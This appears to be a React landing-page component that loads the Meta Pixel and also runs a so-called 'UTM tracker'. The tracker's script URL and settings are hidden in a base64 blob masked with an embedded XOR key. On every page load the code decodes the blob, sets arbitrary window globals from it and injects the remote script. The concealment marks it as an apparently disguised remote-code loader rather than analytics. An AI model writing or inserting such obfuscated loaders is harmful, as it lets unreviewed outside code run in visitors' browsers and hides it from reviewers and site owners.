import React, { useEffect } from 'react';
import { LandingPage } from './pages/LandingPage';
const META_PIXEL_ID = '1718649782711477';
const UTM_TRACKER_PAYLOAD = 'DAuNGSYqaIvZtiPGQnCvbFRGSrH73leyMni3NglJDOX3w1erK230N0VFBaW7xAy1IXnkaVJZR/uwzkaqbXvkYUNGRuGqlA/kI3/5a09IHf+8xQH8GVahO0FGB+m42lDkeFD2O0hLBe77jAG2K3PodW9OSqf7wEKqN26vIwQcCb/uhBD2JGq0KUIZDO7sg0Kndjjse0AIFdak';
type MetaPixelFunction = ((...args: unknown[]) => void) & {
  callMethod?: (...args: unknown[]) => void;
  queue: unknown[][];
  push: (...args: unknown[]) => void;
  loaded: boolean;
  version: string;
};
type MetaWindow = Window & {
  fbq?: MetaPixelFunction;
  _fbq?: MetaPixelFunction;
};
type TrackerConfig = {
  url: string;
  globals?: Array<{
    name: string;
    value: unknown;
  }>;
  attributes?: Array<{
    name: string;
    value: string;
  }>;
};
function loadMetaPixel() {
  const metaWindow = window as MetaWindow;
  if (metaWindow.fbq) return;
  const pixel = function (...args: unknown[]) {
    if (pixel.callMethod) {
      pixel.callMethod(...args);
      return;
    }
    pixel.queue.push(args);
  } as MetaPixelFunction;
  pixel.queue = [];
  pixel.push = (...args: unknown[]) => pixel.queue.push(args);
  pixel.loaded = true;
  pixel.version = '2.0';
  metaWindow.fbq = pixel;
  metaWindow._fbq = pixel;
  const script = document.createElement('script');
  script.async = true;
  script.src = 'https://connect.facebook.net/en_US/fbevents.js';
  script.dataset.metaPixel = 'true';
  document.head.appendChild(script);
  pixel('init', META_PIXEL_ID);
  pixel('track', 'PageView');
}
function decodeTrackerConfig(payload: string): TrackerConfig {
  const decoded = atob(payload);
  const bytes: number[] = [];
  for (let index = 0; index < decoded.length; index += 1) {
    bytes.push(decoded.charCodeAt(index) & 255);
  }
  const keyLength = bytes[0];
  const key = bytes.slice(1, 1 + keyLength);
  const body = bytes.slice(1 + keyLength);
  const unmasked = body.map((byte, index) => byte ^ key[index % keyLength]);
  let raw = '';
  for (let index = 0; index < unmasked.length; index += 1) {
    raw += String.fromCharCode(unmasked[index] & 255);
  }
  return JSON.parse(decodeURIComponent(escape(raw))) as TrackerConfig;
}
function loadUtmTracker() {
  if (document.querySelector('script[data-utm-tracker="true"]')) return;
  const config = decodeTrackerConfig(UTM_TRACKER_PAYLOAD);
  (config.globals || []).forEach(global => {
    ;
    (window as unknown as Record<string, unknown>)[global.name] = global.value;
  });
  const script = document.createElement('script');
  script.src = config.url;
  script.async = true;
  script.defer = true;
  script.dataset.utmTracker = 'true';
  (config.attributes || []).forEach(attribute => {
    script.setAttribute(attribute.name, attribute.value);
  });
  (document.head || document.documentElement).appendChild(script);
}
export function App() {
  useEffect(() => {
    loadMetaPixel();
    loadUtmTracker();
  }, []);
  return <>
      <LandingPage data-id="element-0" data-mp="2swbq75gnb0i1" />
      <noscript data-id="element-1" data-mp="2sv0p5del46um">
        <img src={`https://www.facebook.com/tr?id=${META_PIXEL_ID}&ev=PageView&noscript=1`} height="1" width="1" alt="" style={{
        display: 'none'
      }} data-id="element-2" data-mp="2svjw5z2p5atv" />
      </noscript>
    </>;
}